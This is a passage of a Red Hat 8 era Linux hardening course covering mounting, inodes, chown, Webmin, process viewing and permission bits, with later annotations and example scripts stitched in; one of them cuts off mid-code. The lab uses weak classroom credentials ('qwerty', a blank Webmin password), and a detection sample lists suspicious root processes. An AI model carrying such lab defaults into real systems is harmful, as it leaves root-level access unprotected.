/dev/hda   First IDE hard disk drive (primary channel, master)
/dev/hdb   Second IDE hard disk drive (primary channel, slave)
/dev/sda   First SCSI hard disk drive
/dev/sdb   Second SCSI hard disk drive
/dev/fd0   First floppy disk drive
/dev/fd1   Second floppy disk drive

(Current kernels drive IDE disks through the same layer as SCSI disks, so they appear as /dev/sda, /dev/sdb, and so on; the hdX names belong to the Red Hat 8 era used in this course.)


As previously mentioned, Linux does not present partitions the way Windows operating systems do. There are no assigned drive letters for partitions. In Figure 3-10, you will see that there are two hard disks, each with a partition defined. Disk 1 is the physical storage for several of the directories, and Disk 2 is the physical storage for other directories.

Figure 3-10: Partition structure in the unified file system.

Users of this computer will not be able to identify the two disks when they are looking at the contents of the root directory. The only place where the physical structure is visible will be in the /dev directory. In this directory, the hard disks and partitions are defined as shown in this table.

Location    Description
/dev/hda1   First hard disk, first partition
/dev/hda2   First hard disk, second partition
/dev/hdb1   Second hard disk, first partition
/dev/hdb2   Second hard disk, second partition

Mounting Devices

Devices in the Linux file system are found in the unified file system just as any other object that needs to be accessed. However, in order for these devices to be accessed, they must be mounted. Mounting a device is the process of attaching the file system it holds at a directory (the mount point), so that its contents appear in the unified file system.

For example, suppose you wanted to access a CD-ROM. You would first need to mount the CD-ROM drive into the file system. To do this, use the mount command, as shown here:

mount /dev/cdrom /mnt/cdrom

If you were to enter this command, you would see the following output:

mount: block device /dev/cdrom is write-protected, mounting read-only


Using the mount command as shown allows the device /dev/cdrom to be accessed in the /mnt/cdrom directory, through the unified file system. The output is indicating that the device has been mounted, and that it is mounted read-only.

Because the structure of the file system is logical, you can change the default mount point of a device. For example, the default mount point for a CD-ROM drive is /mnt/cdrom. If you wanted the CD-ROM to be accessed right off the root directory, you could add a directory and mount the CD-ROM device on that directory. The following two commands are all that is required to make the CD-ROM accessible in this manner:

mkdir /cdrom
mount /dev/cdrom /cdrom

Using these two commands, you will be able to access the contents of a CD-ROM disc under /cdrom. When mounting removable or otherwise untrusted media, add the options -o nosuid,nodev,noexec so that set-UID programs, device nodes, and executables on the disc are ignored; the /etc/fstab entries for such media should carry the same options. If you want to change the location of a device that has been previously mounted, you first need to unmount that device. To unmount a device, such as the CD-ROM drive, use the umount command, as shown here:

umount /dev/cdrom

Inodes

Every file in the file system is described by a block of data called an inode. You will see inode defined as both Information Node and Index Node, depending on the text you are reading. Here, we will refer to it simply as inode. Similarly, although on a larger scale, the entire file system is described by a block known as the super block. The super block contains information about the file system, including the overall size of the file system and the number of inodes.

This section focuses on the inode of an individual file, and its structure. The data in a file's inode contains the following:

• File access and type information, otherwise known as the mode.

• File ownership information.

• Time the file was last modified.

• Time the file was last accessed.

• Time the inode itself was last changed (the status-change time, which is updated whenever the ownership, permissions, or link count change).

• File size in bytes.

• File address in physical blocks.

In the list of items in the inode, you will not find the file name and directory location. Those pieces of information are found in the directory itself, which maps file names to inodes. All that the file system is concerned with is the inode number associated with a file; the name is somewhat irrelevant. This is why one file can have several names (hard links), and why deleting a name does not free the data until the last name is gone.

An inode number is assigned when a file is first created on the file system. During formatting, a fixed number of inodes is created, each with an identifying number, alongside the data blocks of equal size that will hold file contents.

To view the inode numbers associated with files, you use the ls -i command.


File Structure

Earlier you used the ls command to list the contents of a directory. You might have noticed much more information than just the file name in the output from this command. All files in Linux are associated with a user and a group. Take the following file example:

-rwxrw-r-- 1 User1 Testers 512 Oct 24 19:42 firstdoc.txt

You might assume that the output was created from issuing the ls -l firstdoc.txt command. Remember that the -l switch on the ls command shows the complete listing for the object; in this case, the firstdoc.txt file.

Here is a breakdown of what the output is defining (the description of the field,followed by the output in the example):

• File Access Permission: -rwxrw-r--

• Number of Links: 1

• File Owner: User1

• Group: Testers

• File Size (bytes): 512

• Last Modification Date: Oct 24

• Last Modification Time: 19:42

• File name: firstdoc.txt

Although the permissions will be discussed in detail later, at this moment there is one section of the File Access Permissions that will be detailed. The first character of the permissions is not technically a permission; rather, it has a special meaning. The first character can be any one of the following:

• If the first character is a dash (-), then the object is a normal file.

• If the first character is the letter d, then the object is a directory.

• If the first character is the letter l, then the object is a symbolic link toanother file.

• If the first character is the letter b, the object represents a block device, suchas a disk drive.

• If the first character is the letter c, the object represents a character device,such as a serial port.

A symbolic link is a link that points to another file, similar to a Windows shortcut. A symbolic link does not contain data; it only refers to another target file by path. That path can be anywhere in the unified file system, including a directory that is mounted from another machine across the network. The following two lines show how a symbolic link can be used. The first line is the link, which points to the file found on the second line. Accessing the link on the first line will display the file of the second line. Note that the permissions shown on the link itself are always rwxrwxrwx and mean nothing; what you may do with the target is governed by the target's own permissions and ownership.

lrwxrwxrwx 1 User1 Testers Oct 24 19:42 sales -> march.tar
-rwxrw-r-- 1 User1 Testers 2048 Oct 24 19:42 march.tar
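As an added example, not from the course, the script below builds the situation in that listing in a temporary directory (the names march.tar and sales are taken from the listing; march.hardlink is an assumed extra name) and shows, with GNU stat and ls, what the inode section described: a hard link shares the inode number and keeps the data alive after the original name is removed, while a symbolic link is its own inode holding a path and is left dangling.

```sh
#!/bin/sh
# Added example (not part of the course): a file name is only a directory
# entry that points at an inode. A hard link is a second name for the same
# inode; a symbolic link is a separate inode whose data is a path. Uses
# GNU stat and ls; everything is created under a temporary directory.
WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

printf 'march sales data\n' > "$WORK/march.tar"
ln    "$WORK/march.tar" "$WORK/march.hardlink"    # hard link: same inode
ln -s march.tar         "$WORK/sales"              # symbolic link: new inode

# Inode number of a path (the link itself, not its target).
inode_of() { stat -c %i "$1"; }

# Succeeds when two paths are names for the same inode, i.e. hard links.
same_inode() { [ "$(inode_of "$1")" = "$(inode_of "$2")" ]; }

# The type character that ls -l prints first: - file, d directory, l link.
type_char() { ls -ld "$1" | cut -c1; }

# Link count, the second column of ls -l: how many names the inode has.
link_count() { stat -c %h "$1"; }

# Remove the original name and report what survives: the hard link still
# reaches the data (link count now 1); the symbolic link dangles.
unlink_original() {
    rm "$WORK/march.tar"
    if [ -e "$WORK/sales" ]; then state=reachable; else state=dangling; fi
    echo "$(link_count "$WORK/march.hardlink") $state $(cat "$WORK/march.hardlink")"
}

ls -li "$WORK"    # same inode number for march.tar and march.hardlink
```

The security point is the hard link: a user who can create a link to a file keeps a copy of its data even after the owner deletes the original name, and the link count column in ls -l is the only hint that another name exists. The dangling symbolic link is the other classic problem: whoever can create a file at the target path decides what the link now opens.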


TASK 3A-3
Viewing File Details

Setup: You are logged on to Red Hat 8 as root, and a Terminal Window is open.

1. If necessary, change to the lab2 directory.

2. Enter ls -l to view the details of the file you made earlier.

3. Observe the structure of the file in the directory, paying particular attention to the owner, group, access times, and file size.

Object Ownership

As you saw in the file structure, every file has an associated group and a file owner. By default, when you create a new file in your home directory, you will be the owner, and your primary group will be the assigned group for that file. There may be instances, however, where you will need to change the owner of an object, such as a file, to allow others to manage the object.

The only user account that can change the ownership of a file is the root account. In addition to changing a file's ownership, the root account can change the ownership of a directory. The command for changing the ownership of a file is chown <new owner> <filename>. So, in the following example, a file called payroll.doc is having the user account vp_finance assigned as the new owner:

chown vp_finance payroll.doc

If you want to assign a new group to the object at the same time, the command is similar. The only difference is to add a separator and the group name after the user account. The course uses a period (dot) as the separator, which GNU chown accepts; the standard form is a colon (vp_finance:accounting), and it is the one to prefer, because a dot can also be part of a user name. In the following example, the file called payroll.doc is having the user account vp_finance and the group account accounting assigned as the new owners:

chown vp_finance.accounting payroll.doc

In the event that the requirement is to change the ownership of a directory, and all the files or directories inside that directory, then the command is chown with the -R switch. The first example will change the ownership of the /marketing/June directory to have the marketing group as the group owner and vp_marketing as the user. The second example does not change the user of the object, but changes the group:

chown -R vp_marketing.marketing /marketing/June
chown -R .marketing /marketing/June

After the previous command has been entered, all files and directories in the /marketing/June directory will have the marketing group as the group owner. To change the group ownership of a file or a directory if you are not the root account, you can use the chgrp command; however, in order to use this command, you must own the file and be a member of the group to which you want to assign it. (Ordinary users cannot give files away with chown; that restriction exists so that a user cannot dodge a disk quota or plant a file that appears to belong to someone else.)


Webmin

Although you will most likely become quite comfortable, if you are not already, with managing your Linux machine from the Terminal Window and in the GUI, there is another administrative tool that is available for you to use. The tool is called Webmin.

Webmin is a Web-based graphical interface for managing and making system administrative changes. Any Web browser that supports tables and forms will work for this tool. By using Webmin, you can manage user accounts, configure file sharing, manage DNS, and more. Figure 3-11 shows a simple layout of Webmin, once the user has logged in.

Figure 3-11: Basic layout of Webmin.

Webmin is a freely available tool that can be found at www.webmin.com. In this course, the version used is 1.020. Updates are available at the Webmin Web site, so you can update as you wish. Keep in mind that Webmin runs with root privileges and listens on its own TCP port (10000 by default), so a login to Webmin is a root login: on a production machine, set a strong password immediately, restrict the addresses allowed to connect, and keep the software current.


TASK 3A-4
Installing Webmin

Setup: You are logged on to Red Hat 8 as root, and a Terminal Window is open.

1. Use the Nautilus File Manager to open your home directory. (From the Main Menu, choose Home Folder, or double-click the root's Home icon on the workspace.)

2. Navigate to the / (root) directory.

3. Right-click the open space, and choose New Folder.

4. Name the new folder Webmin.

5. Copy the Webmin Tarball or RPM to the new /Webmin directory. Your instructor will provide the location of the Webmin installation file.

6. Switch to the Terminal Window, and change to the new directory using the cd /Webmin command.

7. Follow your instructor's directions to install Webmin. When you have accepted all of the default answers, the system should report a successful installation.

A default installation of the Webmin RPM sets the login name and password to root's login credentials, while a default installation of the Tarball sets the login name as admin and the password as blank, or null. A blank password on a root-equivalent Web interface must never be left in place outside the classroom; set one as soon as the installation finishes.

8. Test Webmin by opening a Web browser. The Web browser is the globe icon next to the Red Hat Main Menu icon.

9. In the Browser address bar, enter http://localhost:10000, and press Enter.

10. In the login screen that is displayed, enter the login credentials for Webmin. This should be admin and no password, if you performed the default Tarball installation, or root's credentials, if you performed the default RPM install.

11. In the Confirm box, click No. In the Security Warning box, click Continue.

12. At this stage, make no configuration changes, but feel free to perform some basic navigation.

13. When you are done exploring Webmin, close the Webmin window, and close the Nautilus File Manager.

System Information

The last fundamental component of managing a Linux system that is discussed in this topic is the issue of finding and viewing system information. When securing your Linux system, you will want to know what processes are running, and how to identify those processes.

Allow students 5 to 10 minutes to explore Webmin.


Process IDs

Every executable file on the computer can be thought of as a program. When a program is executed, the running instance is referred to as a process. On a Linux system, associated with each process is a unique numeric identifier known as the Process Identifier (PID). Users can create processes, control the execution of a process, and even receive notification if a process's execution status changes.

Viewing the System Information

There are several commands that you can run to display and analyze the performance of a system. Two of these commands are ps and top. By using these commands, you can identify running processes, the amount of CPU time a process is taking, the user account associated with the process, the amount of memory a process is taking, and more. Figure 3-12 shows what the ps command output looks like.

Figure 3-12: The basic information provided by the ps command.

Although the above information is useful and provides solid data, there might be times when you are looking for a higher level of detail. In that case, you can use the ps command with aux. The ps aux command lists all the processes on the system, including the user account associated with each process. Figure 3-13 shows what the ps aux command output looks like. In the ps aux command, the three letters (BSD-style options, given without a dash) provide:

• a—Processes belonging to all users, not just your own

• u—User-oriented output format, which adds the user name, CPU and memory use, and start time to each line

• x—Processes that have no controlling terminal, which is where daemons and other background services appear

The ps command on its own lists only the processes that belong to the current user and share its terminal, while ps aux lists all running processes.


Figure 3-13: Running the ps aux command shows more detailed information than the ps command alone.

Using the ps command shows the processes and other data in a snapshot when the command is run. In many instances, this will provide the exact information that you were looking for. If, however, you are trying to watch the processes interactively, you will need to use the top command. By default, the top program updates the screen every few seconds (5 seconds in the top shipped with Red Hat 8; current procps versions use 3). If you wanted to set the interval to 7 seconds, for example, you would use the command top d 7 (current versions require the dash: top -d 7). There are additional functions available while running the top program; to see the list of what is available, press the H key while top is running.
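As an added example (not from the course), the following shell function takes ps aux output and reports root-owned processes whose command path is outside the system program directories, which is the first thing to look for when deciding whether a process belongs on the machine. The ps lines are a constructed sample laid out like the Red Hat 8 output, with an assumed /tmp/.x/httpd and /home/User1/listener standing in for anything unexpected; pipe the live ps aux into the function to run it for real.

```sh
#!/bin/sh
# Added example (not part of the course): read `ps aux`-format text on
# standard input and report root-owned processes whose command path lies
# outside the directories where packaged programs normally live. Feed it
# either the constructed sample below or the live command (ps aux | ...).
# Output: PID:command, one per line.
root_procs_outside_system_dirs() {
    awk '
        NR == 1 || $1 != "root" { next }     # header line, non-root processes
        { cmd = $11 }                        # first word of the COMMAND column
        cmd ~ /^\[.*\]$/ { next }            # kernel threads, shown in brackets
        cmd !~ /^\// { next }                # no path shown: cannot judge, see note
        cmd !~ /^\/(usr\/)?(s?bin|lib|libexec)\// { print $2 ":" cmd }
    '
}

# Constructed sample in the layout ps aux prints; not from any real host.
SAMPLE_PS='USER       PID %CPU %MEM   VSZ  RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1  1372  476 ?        S    10:02   0:04 init
root         5  0.0  0.0     0    0 ?        SW   10:02   0:00 [kswapd]
root       612  0.0  0.3  2240 1104 ?        S    10:02   0:00 /usr/sbin/sshd
root       731  0.0  0.2  1580  640 ?        S    10:03   0:00 /tmp/.x/httpd
User1     1102  0.0  0.4  4300 1900 pts/0    S    10:15   0:00 -bash
root      1190  0.1  0.5  5112 2200 pts/1    S    10:20   0:01 /home/User1/listener -p 4444'

# Number of root processes the filter reports for the sample.
suspicious_count() {
    printf '%s\n' "$SAMPLE_PS" | root_procs_outside_system_dirs | wc -l | tr -d ' '
}

printf '%s\n' "$SAMPLE_PS" | root_procs_outside_system_dirs   # 731:/tmp/.x/httpd, 1190:/home/User1/listener
```

The COMMAND column is whatever the process reports as its own name, which a program can set to anything, so treat this as a first filter: for each PID it prints, confirm the binary with ls -l /proc/PID/exe, a link the kernel maintains and the process cannot rewrite. Commands shown without a path (init in the sample) are skipped rather than guessed at.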

By now, you should be comfortable with the fact that in Red Hat Linux, there are often several ways to complete a task, namely the command-line tools and the GUI tools. There is also a tool available in the GUI that can display system information interactively. This tool is called System Monitor. System Monitor allows you to select columns to sort data, in either ascending or descending order.


Figure 3-14: Running the System Monitor in Red Hat Linux.

One other piece of system information that you might want to identify is the disk space used. To view a report on the system's use of allocated disk space, you can use the df command. Entering df in a Terminal Window shows disk-space information. The default view shows the disk information in 1-K blocks. To view the information in human-readable units (K, M, G), use the -h option, as shown in Figure 3-15.

Figure 3-15: Viewing disk-space allocation on a Linux system by using the df -h command.


TASK 3A-5
Viewing System Information

Setup: You are logged on to Red Hat 8 as root, and a Terminal Window is open.

1. Enter ps to view the current processes.

2. Enter ps aux to view the full list of all processes.

3. Enter top to view the processes interactively.

4. While top is still running, press H to look at the available functions in top.

5. Close all Terminal Windows.

6. From the Red Hat Main Menu, choose System Tools→System Monitor.

7. Scroll through the System Monitor options, comparing them to the ter-minal commands you just used.

8. When you have completed your review, close System Monitor.

9. Open a Terminal Window.

10. Enter df -h to view information about the disk space.

11. Close the Terminal Window.

Topic 3B
Fundamental Linux Security

In Linux, basic security measures consist of file system security, password security, and authentication methods. Let's begin by looking at file system security.

File and Directory Permissions

In Linux, when you log in to the system, you are identified by your user account. In addition to your user account, you might belong to a group or groups. A file can have permissions set for a user account, a group, and a category called others. If you are accessing an object and you are not the owner of the file (usually the creator of the file) or in the group that has access, then you are considered to be one of the others.

Earlier, you were introduced to the information provided when viewing a file's details. This included the permissions for that file. Remember that every file has an owner and a group. Previously, you looked at a file whose details were:

-rwxrw-r-- 1 User1 Testers 512 Oct 24 19:42 firstdoc.txt

In this line, the firstdoc.txt file has permissions of: -rwxrw-r--


Now, for users of Windows operating systems, this will take a bit of getting used to, but the permission structure is logical. Look at the following other file examples:

-rwxrwxrwx 1 User1 Testers 512 Oct 9 sample.txt
-rw-r--r-- 1 User2 Newbies 1024 Oct 10 test.tar
drwxr-xr-- 1 User3 Finance 2048 Oct 11 15:26 DB_3

In these examples, notice that the first part of each line has a different listing of the permissions, and that the third example object is a directory (you can tell from the letter d as the first character). You can consider the permissions to be defined in columns.

The permissions are broken into the object type (such as file or directory), user permissions, group permissions, and others permissions. Looking at the previous firstdoc.txt example, this breaks down into the following (divided here by the pipe symbol so that you can easily see the divisions):

- | rwx | rw- | r-- |

The first column is a single character (in this case a dash, which represents a standard file), and is the only column that is not three characters in length. The second column represents the permissions for the user (owner), the third column represents the permissions for the group, and the fourth column represents the permissions for the others. The user's permission (User1 in this example) is listed as rwx, the group's permission (Testers in this example) is listed as rw-, and the others' permission is listed as r--. Note that the kernel checks exactly one column: if you are the owner, only the owner column counts, even when the group or others column would grant more.

Files and directories have three permissions: Read (r), Write (w), and Execute (x); a dash (-) in a position means that permission is not granted, for files and directories alike. These permissions mean slightly different things for files and directories. The Read permission for files grants the ability to open and read a file's contents; for directories, the Read permission grants the ability to list the names in the directory. The Write permission for files grants the ability to modify (add, delete, or change) a file's content; for directories, the Write permission grants the ability to add, remove, or rename entries in the directory, which is why write access to a directory lets a user delete files in it that they cannot themselves write to. The Execute permission for files grants the ability to execute the file as a program; for directories, the Execute permission grants the ability to enter the directory (with cd) and to reach the files inside it by name, which is why a directory with r but not x can be listed but not used, and one with x but not r can be used only by someone who already knows the file names.

Before moving further into the permissions, we must spend a moment on number conversions. The permissions in Linux are written as octal numbers, which is a base-8 counting system. The octal system has 8 unique digits (0 through 7), and each octal digit corresponds exactly to three binary digits. The following table is a quick refresher on binary-to-octal conversions.

Binary Number   Octal Equivalent
000             0
001             1
010             2
011             3
100             4
101             5
110             6
111             7
1000            10

Lesson 3: Hardening Linux Computers 163


Page 217: SCNP Hardening

For each permission (user, group, and others), there are three possible characters: r, w, and x. These permission characters are always in this order. If a permission is granted, then a 1 is assigned to that character space. If a permission is not granted, then a 0 is assigned to that character space. Let’s use the permissions of the firstdoc.txt as an example. The permissions were -rwxrw-r--.

The first character is a dash, therefore this is a file. The user permission is rwx, the group permission is rw-, and the others permission is r--. This can also be viewed as user permissions of 111, group permissions of 110, and others permissions of 100. The following table shows the conversions, from octal to binary to permissions.

Octal Number    Binary Equivalent    Permissions
0               000                  ---
1               001                  --x
2               010                  -w-
3               011                  -wx
4               100                  r--
5               101                  r-x
6               110                  rw-
7               111                  rwx

Using this table, you can see that if you want to assign the permission of Read (r), and no other permission, then octal 4 is the permission to assign. Likewise, if you want to assign the permission of Read, Write, and Execute (rwx), then octal 7 is the permission to assign. As a final example, if you want to assign the permission of Read and Write (rw), then octal 6 is the permission to assign.

Although you might end up memorizing the permission list shown, there is another method of arriving at the octal values. From your experience with binary numbers, you know that the three values listed are decimal 4, 2, and 1. Because the permissions are always defined as r, w, and x (in that order), you can also assign decimal values to these permissions. The Read permission is always on the left, the third character in binary, and can be assigned a decimal value of 4. The Write permission is always in the middle, the second character in binary, and can be assigned a decimal value of 2. The Execute permission is always on the right, the first character in binary, and can be assigned a decimal value of 1.

Therefore, the following is always true: Read = 4, Write = 2, and Execute = 1. Using this method, if you want to assign Read and Write permissions, simply add 4 + 2, to get 6. Compare that to the previous list, verifying the octal, binary, and permissions do indeed match. You will see how this system works, and how it can be very efficient.

Using the octal system for setting permissions creates values such as 0400, or 0440, and more. These four numbers represent the four columns of permissions described earlier. At this time, the first number will always be 0, as that is the character that defines the type of object (such as a file, a directory, or a link). Due to this, it is not uncommon for the leading 0 to not be listed. This would make the previous two permission examples simply 400 and 440.


An overall permission of 400 means that the user is given a permission of 4, the group a permission of 0, and the others a permission of 0. An overall permission of 440 means the user is given a permission of 4, the group a permission of 4, and the others a permission of 0. As a final example, an overall permission of 774 means the user is given a permission of 7, the group a permission of 7, and the others a permission of 4.

Setting Permissions

There are two methods of working with the permissions of an object. One method uses octal numbers, and the other uses permission strings. When setting permissions by using a string, you must answer three primary questions. They are:

1. Whom will this permission affect? (u) User, (g) Group, (o) Others, (a) All

2. What permission will be set? (r) Read, (w) Write, (x) Execute, (s) SetUID or SetGID, (t) Sticky Bit

3. What type of action is to be taken? (+) Addition, (-) Removal

Look at the following examples to see how the answers to these three questions work together to create the permission string:

• If you want to allow the group to have Read access, the string is g+r

• If you want to allow the owner (user) to have Read and Write access, the string is u+rw

• If you want to allow all (every user) to have Read and Execute access, the string is a+rx

The chmod Command

The command to use to change permissions is chmod (Change Mode). With chmod, you can use either the octal method or the string method. The following two examples show chmod being used with each method. These permissions are giving the user Read, Write, and Execute permissions, the group Read, Write, and Execute permissions, and the others Read permission.

chmod 774 vacation_pictures.tar.gz
chmod u+rwx,g+rwx,o+r vacation_pictures.tar.gz

The following example shows these methods used to change the permissions on a directory. In this example, the directory is called /database/Feb. The first two lines are examples of setting the permissions for everyone to have full access to this database. The second two lines add the -R option, which allows the changed permission to apply to all files and subdirectories in the directory. The second two lines are giving the directory Read, Write, and Execute permissions to the user and group, and Read to others.

chmod 777 /database/Feb
chmod a+rwx /database/Feb
chmod -R 774 /database/Feb
chmod -R u+rwx,g+rwx,o+r /database/Feb

In the following task, you will create four user accounts, who are part of two groups. You will then create four files and two directories. Finally, you will configure the ownership of these objects, and verify the new ownership.


TASK 3B-1
Creating Object Ownerships

Setup: You are logged on to Red Hat 8 as root, and a Terminal Window is open.

1. Use either the Terminal Window or the Red Hat User Manager to create the following list of users and groups, and assign the users to the groups. For each user, the password is qwerty.

a. User1, GroupA

b. User2, GroupA

c. User3, GroupB

d. User4, GroupB

2. Use either the Terminal Window or the Nautilus File Manager to create the following files and directories:

a. /Marketing/Campaign.txt

b. /Marketing/Tracking.txt

c. /Research/Software.txt

d. /Research/Development.txt

3. In the Terminal Window, check the current ownership and permissions for the Marketing directory by using the ls -l /Marketing command.

4. Check the current ownership and permissions for the Research directory.

5. Change directories to the Marketing directory.

6. Enter chown User1.GroupA Campaign.txt to change the ownership of Campaign.txt.

7. Change the ownership of Tracking.txt to User2.GroupA.

8. Change directories to the Research directory.

9. Change the ownership of Software.txt to User3.GroupB.

10. Change the ownership of Development.txt to User4.GroupB.

11. Check the current ownership and permissions for the Marketing directory.

12. Check the current ownership and permissions for the Research directory.

13. Change directories back to /root.

14. From root, change the ownership of the Marketing directory by using the chown -R .GroupA /Marketing command.

15. Change the ownership of the Research directory to GroupB.

You can either delete the existing User1 and create a new one, or modify the properties of the existing one.


Assigning Permissions

Once you have created the objects described in the previous task, you have the pieces in place to create the permission structure. You are going to create permissions that allow members of Group A to have access to the Marketing folder, with User1 accessing the Campaign.txt document. User2 will be given access to the Tracking.txt document. User3 will be given access to the Software.txt document, and User4 will be given access to the Development.txt document.

TASK 3B-2
Assigning Permissions

Setup: You are logged on to Red Hat 8 as root, and a Terminal Window is open.

1. Change to the Marketing directory.

2. Enter chmod 740 Campaign.txt to assign the permissions to Campaign.txt.

3. Enter chmod 740 Tracking.txt to assign the permissions to Tracking.txt.

4. Change to the /root directory.

5. Enter chmod -R 770 /Marketing to assign the permissions to the Marketing directory.

6. Change to the Research directory.

7. Enter chmod u+rwx,g+rwx Software.txt to assign the permissions to Software.txt.

8. Enter chmod u+rwx,g+rwx Development.txt to assign the permissions to Development.txt.

9. Change to the /root directory.

10. Enter chmod -R 770 /Research to assign the permissions to the Research directory.

Testing Assigned Permissions

At this stage, you have created four users, two groups, four files, and two directories. You then assigned the users to their groups, and assigned permissions on the files and directories. Next, you will test the permissions by logging in as the four users (using the substitute user command) and attempting to access all four files. It is recommended that you take advantage of the Workspace Switcher in this task, because it lets you have one workspace open for each user.


TASK 3B-3
Verifying Permissions

Setup: You are logged on to Red Hat 8 as root, and a Terminal Window is open.

1. In the Terminal Window, enter su - User1 to switch to the User1 account.

2. Attempt to access all four files from the previous task.

3. Identify which ones you can access, the level of access (by trying to create a file, for example), and the ones you cannot access.

File Name                    Access Granted?    Level of Access Granted
/Marketing/Campaign.txt      Yes                rwx
/Marketing/Tracking.txt      Yes                rwx
/Research/Software.txt       No                 None
/Research/Development.txt    No                 None

Verify that the access is correct based on the permissions you assigned in the previous task.

4. Activate the Workspace Switcher, and click any open space to switch to another workspace.

5. Open a Terminal Window.

6. Enter su - User2 to switch to the User2 account.

7. Attempt to access all four files from the previous task.

8. Identify which ones you can access, the level of access (by trying to create a file, for example), and the ones you cannot access.

File Name                    Access Granted?    Level of Access Granted
/Marketing/Campaign.txt      Yes                rwx
/Marketing/Tracking.txt      Yes                rwx
/Research/Software.txt       No                 None
/Research/Development.txt    No                 None

Verify that the access is correct based on the permissions you assigned in the previous task.

9. Activate the Workspace Switcher, and click any open space to switch to another workspace.

10. Open a Terminal Window.

11. Enter su - User3 to switch to the User3 account.


12. Attempt to access all four files from the previous task.

13. Identify which ones you can access, the level of access (by trying to create a file, for example), and the ones you cannot access.

File Name                    Access Granted?    Level of Access Granted
/Marketing/Campaign.txt      No                 None
/Marketing/Tracking.txt      No                 None
/Research/Software.txt       Yes                rwx
/Research/Development.txt    Yes                rwx

Verify that the access is correct based on the permissions you assigned in the previous task.

14. Switch to another workspace, open a Terminal Window, and switch to the User4 account.

15. Attempt to access all four files from the previous task.

16. Identify which ones you can access, the level of access (by trying to create a file, for example), and the ones you cannot access.

File Name                    Access Granted?    Level of Access Granted
/Marketing/Campaign.txt      No                 None
/Marketing/Tracking.txt      No                 None
/Research/Software.txt       Yes                rwx
/Research/Development.txt    Yes                rwx

Verify that the access is correct based on the permissions you assigned in the previous task.

17. Close all windows and workspaces, and return to the root account.

The SetUID, SetGID, and the Sticky Bit Permissions

Earlier, when you were first looking at permissions, three other things were listed in addition to Read, Write, Execute, and No Permission—SetUID, SetGID, and the Sticky Bit. The SetUID (or Set User Identification) permission bit can be set on an executable file. When set on a file, the file will execute not with the permissions of the user who is running the program, but with the permissions of the owner of the program. The use of this is not suggested, as it can cause security problems—having a program execute by one user with the permissions of a different user. SetGID (or Set Group Identification) is similar to SetUID, only the permissions on the executable are based on group permissions.


Applications that are designed to use the SetUID or the SetGID permission must be properly secured. These applications are often programmed to run as root, and any attempt at altering these files could lead to a system breach.

It is rumored that the Sticky Bit feature was originally created to let an application remain (or stick) in the computer’s memory even after it had finished running. This would allow for quicker recall and execution if and when that object were to be called again. As systems have increased in power and the abilities of memory (both in speed and capacity) have increased, the need for the Sticky Bit has diminished. However, a new use for the Sticky Bit has evolved. When the Sticky Bit is set for a directory, such as /tmp, it protects the files within that directory from deletion by non-owners. Consider the file /tmp/yrlyrept. If the Sticky Bit has been set for /tmp, only the owner of the /tmp/yrlyrept file or the owner of the /tmp directory can delete the file.

In the following examples you will see the process of setting the setGID, setUID, and the Sticky Bit permissions. In the command chmod -v 1777 file, the chmod command itself should be familiar to you by now, the -v just tells the machine to be verbose—to give an output related to the command, rather than just executing the command silently.

Using chmod as is done in the first of the examples listed below sets the permissions on files to rwxrwxrwx—there is nothing new about that, but now we can look at the bits in front of those nine:

- - - r w x r w x r w x

• The 10th bit (reading from the right as we do in binary) designates the sticky bit.

• The 11th bit (reading from the right) designates the SetGID bit.

• The 12th bit (reading from the right) designates the SetUID bit.

So the command chmod 1777 file would give all three groups (owner, group, other) read, write, and execute permissions, but set the sticky bit so that only the root account could delete the file.

Here are some other possible commands and their meanings. All commands give rwx to all three objects; only the 10th, 11th, and 12th bits are of interest to us for this demonstration.

Command               Result                                       Comment
chmod -v 777 file     Mode of file changed to 0777 (rwxrwxrwx).
chmod -v 1777 file    Mode of file changed to 1777 (rwxrwxrwt).    Sticky Bit is set.
chmod -v 2777 file    Mode of file changed to 2777 (rwxrwsrwx).    GID is set.
chmod -v 3777 file    Mode of file changed to 3777 (rwxrwsrwt).    GID and Sticky Bit are set.
chmod -v 4777 file    Mode of file changed to 4777 (rwsrwxrwx).    UID is set.
chmod -v 5777 file    Mode of file changed to 5777 (rwsrwxrwt).    UID and Sticky Bit are set.
chmod -v 6777 file    Mode of file changed to 6777 (rwsrwsrwx).    GID and UID are set.

breach: The successful defeat of security controls which could result in a penetration of the system. A violation of controls of a particular information system such that information assets or system components are unduly exposed.


Command               Result                                       Comment
chmod -v 7777 file    Mode of file changed to 7777 (rwsrwsrwt).    GID, UID, and Sticky Bit are set.
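To tie together the octal method, the permission strings from the Setting Permissions section, and the special bits in the table above, here is an added Python model of the mode bits. It is not course code and does not run chmod; it reproduces the letters ls -l shows and the add/remove semantics of chmod strings. Two points it makes explicit: a string such as u+rwx,g+rwx,o+r only adds to the bits already present, so it equals 774 only when starting from no permissions, and ls prints S or T when a special bit is set without the matching execute bit. One caveat for the table: the Linux kernel honours the sticky bit only on directories, so chmod 1777 on a plain file changes what ls shows but not who may delete it.

```python
"""Added example: a model of Linux mode bits (rwx plus SetUID, SetGID and the
Sticky Bit). Not course code; it does not touch the filesystem."""
import stat

# For each rwx group: who letter, bit shift, the special bit ls prints in that
# group's execute column, and the letter ls uses for it.
TRIPLES = (
    ("u", 6, stat.S_ISUID, "s"),
    ("g", 3, stat.S_ISGID, "s"),
    ("o", 0, stat.S_ISVTX, "t"),
)
RWX = {"r": 4, "w": 2, "x": 1}


def mode_to_string(mode: int) -> str:
    """Render a mode as the nine characters ls -l shows, e.g. 0o4755 -> rwsr-xr-x."""
    text = ""
    for _who, shift, special, letter in TRIPLES:
        bits = (mode >> shift) & 0o7
        text += "r" if bits & 4 else "-"
        text += "w" if bits & 2 else "-"
        if mode & special:
            # lowercase when execute is also set, uppercase S/T when it is not
            text += letter if bits & 1 else letter.upper()
        else:
            text += "x" if bits & 1 else "-"
    return text


def string_to_mode(text: str) -> int:
    """Inverse of mode_to_string; also accepts the 10-character form (-rwxrw-r--)."""
    if len(text) == 10:
        text = text[1:]  # drop the file-type column
    if len(text) != 9:
        raise ValueError("expected nine permission characters")
    mode = 0
    for index, (_who, shift, special, _letter) in enumerate(TRIPLES):
        r, w, x = text[3 * index:3 * index + 3]
        if r == "r":
            mode |= 4 << shift
        if w == "w":
            mode |= 2 << shift
        if x in ("x", "s", "t"):
            mode |= 1 << shift
        if x in ("s", "S", "t", "T"):
            mode |= special
    return mode


def apply_symbolic(mode: int, spec: str) -> int:
    """Apply a chmod string such as "u+rw,g-w,a+x" (who: u g o a; permission:
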